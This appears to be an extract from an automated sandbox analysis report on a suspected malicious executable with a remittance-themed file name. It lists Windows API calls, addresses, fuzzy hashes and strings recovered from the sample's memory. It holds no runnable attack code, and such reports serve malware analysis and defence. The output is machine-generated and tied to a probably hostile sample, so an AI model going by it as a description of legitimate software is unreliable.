                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateDestroy
                                                                      • String ID: ,$tooltips_class32
                                                                      • API String ID: 1109047481-3856767331
                                                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1441871840-4108050209
                                                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 3631882475-2268648507
                                                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                      • SendMessageW.USER32 ref: 00471740
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                      • SendMessageW.USER32 ref: 0047184F
                                                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                      • String ID:
                                                                      • API String ID: 4116747274-0
                                                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu$Sleep
                                                                      • String ID: 0
                                                                      • API String ID: 1196289194-4108050209
                                                                      • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                      • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0043143E
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                      • String ID: (
                                                                      • API String ID: 3300687185-3887548279
                                                                      • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                      • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                      APIs
                                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1976180769-4113822522
                                                                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                      • String ID:
                                                                      • API String ID: 461458858-0
                                                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                      • DeleteObject.GDI32(?), ref: 004301D0
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3969911579-0
                                                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                      • String ID: 0
                                                                      • API String ID: 956284711-4108050209
                                                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 1965227024-3771769585
                                                                      • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                      • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 369157077-1007645807
                                                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00445BF8
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                      • __wcsicoll.LIBCMT ref: 00445C33
                                                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 3125838495-3381328864
                                                                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
